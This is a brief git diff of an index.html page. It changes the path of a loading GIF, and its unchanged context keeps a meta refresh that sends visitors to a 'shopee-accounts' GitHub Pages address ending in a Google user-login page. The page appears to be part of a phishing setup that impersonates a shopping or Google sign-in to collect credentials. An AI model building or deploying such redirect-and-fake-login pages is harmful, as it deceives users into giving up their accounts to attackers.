--- a/index.html
+++ b/index.html
@@ -13,6 +13,6 @@
 <br>
 <br>
 <br>
-<p align="center"><img src="./login_files/loading.gif">
+<p align="center"><img src="./css/loading.gif">
 </p>
 <meta http-equiv="refresh" content="1;url=https://shopee-accounts.github.io/google/userlogin_u.htm">
